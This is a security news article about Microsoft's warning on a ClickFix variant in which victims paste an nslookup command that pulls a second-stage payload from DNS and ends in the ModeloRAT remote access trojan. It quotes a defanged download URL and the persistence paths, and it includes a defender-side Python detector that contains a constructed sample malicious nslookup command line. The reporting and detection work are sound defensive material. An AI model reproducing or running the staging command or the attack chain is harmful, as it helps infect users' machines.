Microsoft alerts on DNS-based ClickFix variant delivering malware via nslookup
Microsoft warns of a new ClickFix variant that tricks users into running DNS commands to fetch malware via nslookup.
Microsoft has revealed a new ClickFix variant that deceives users into running a malicious nslookup command through the Windows Run dialog to retrieve a second-stage payload via DNS. ClickFix typically uses fake CAPTCHA or error messages to trick victims into infecting their own systems, helping attackers evade security defenses. The technique has evolved into multiple variants over the past two years.
“Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution,” Microsoft Threat Intelligence (@MsftSecIntel) wrote on X on February 13, 2026.
In the latest ClickFix variant, attackers use cmd.exe to perform a DNS lookup against a hard-coded external server. The `Name:` response is extracted and executed as the second-stage payload. This DNS-based approach lets attackers signal and deliver payloads via their own infrastructure, reducing reliance on web requests and helping the malicious activity blend into normal network traffic.
“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver. The output is filtered to extract the `Name:` DNS response, which is executed as…”
— Microsoft Threat Intelligence (@MsftSecIntel), February 13, 2026
Microsoft warns that this new ClickFix variant uses DNS as a “lightweight staging or signaling channel,” allowing attackers to reach their own infrastructure and add a validation step before running the second-stage payload. This method reduces reliance on web requests and helps hide malicious activity in normal network traffic. The payload downloads a ZIP from an external server, extracts a Python script to conduct reconnaissance, and drops a VBScript that launches ModeloRAT, a Python-based RAT.
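As a defender-side illustration added to this article (it is not code from the Microsoft report or from Security Affairs), the following Python scores process-creation events for the traits described above: nslookup launched through cmd.exe, an explicit external DNS server instead of the system resolver, and output filtered for the `Name:` line. The event records, IP addresses, domain names and score weights are constructed samples and assumptions, not indicators from the report.

```python
import ipaddress
import re

# Constructed process-creation events (parent, image, command line); not from
# the Microsoft report. Fields mirror a Sysmon Event ID 1 or EDR feed.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe", "cmd.exe /c nslookup -q=a stage.example.invalid 203.0.113.9 | findstr Name:"),
    ("explorer.exe", "cmd.exe", "cmd.exe /c nslookup www.example.com"),
    ("powershell.exe", "nslookup.exe", "nslookup intranet.corp.example 10.0.0.53"),
    ("cmd.exe", "cmd.exe", "cmd.exe /c nslookup -type=txt _dmarc.example.com 8.8.8.8"),
]

# Resolvers in these ranges are local or the organisation's own; any other
# server literal is treated as an external, attacker-controllable resolver.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
                 "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
NSLOOKUP_RE = re.compile(r"nslookup(?:\.exe)?\s+([^|&]*)", re.IGNORECASE)
PARSE_RE = re.compile(r"findstr|\bfind\b|for\s+/f", re.IGNORECASE)

def is_external_ip(token):
    try:
        ip = ipaddress.ip_address(token)
    except ValueError:
        return False  # a hostname, or not an address at all
    return not any(ip in net for net in INTERNAL_NETS)

def score_event(parent, image, cmdline):
    """Score one event; higher means closer to the DNS-staged ClickFix pattern."""
    m = NSLOOKUP_RE.search(cmdline)
    if not m:
        return 0, []
    score, reasons = 1, ["nslookup invoked"]
    # Positional args: the name queried, then an optional explicit DNS server.
    positional = [t for t in m.group(1).split() if not t.startswith("-")]
    if len(positional) >= 2:
        server = positional[1]
        if is_external_ip(server):
            score += 3; reasons.append(f"external resolver {server}")
        else:
            score += 1; reasons.append(f"explicit resolver {server}")
    # The distinguishing tell: output filtered for the 'Name:' line and handed on.
    if "name:" in cmdline.lower() and PARSE_RE.search(cmdline):
        score += 2; reasons.append("output parsed for 'Name:'")
    # The Run dialog launches commands under explorer.exe, as in the lure.
    if parent.lower() == "explorer.exe" and image.lower() == "cmd.exe":
        score += 1; reasons.append("cmd.exe spawned from explorer.exe")
    return score, reasons

def suspicious_events(events=SAMPLE_EVENTS, threshold=5):
    return [i for i, e in enumerate(events) if score_event(*e)[0] >= threshold]
```

Only the first sample reaches the threshold; the fourth, an admin querying a public resolver, scores on the external server alone and stays below it, which is why the `Name:` parsing step carries most of the weight.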
Attackers achieve persistence by creating a Windows shortcut in the Startup folder, ensuring the malware runs at every system startup.
“Upon execution of the second-stage payload provided by the DNS response, the attack proceeds through an attack chain leading to downloading hxxp://azwsappdev[.]com/wdhmgpmihudkueq[.]zip and extracting a portable Python bundle and malicious Python code, then running a malicious Python script for host/domain reconnaissance, performing a series of discovery commands, before dropping the final payload `%APPDATA%\WPy64-31401\python\script.vbs` and `%STARTUP%/MonitoringService.lnk` pointing to the VBScript for persistence. This final payload is a remote access trojan and is called ModeloRAT,” concludes the report.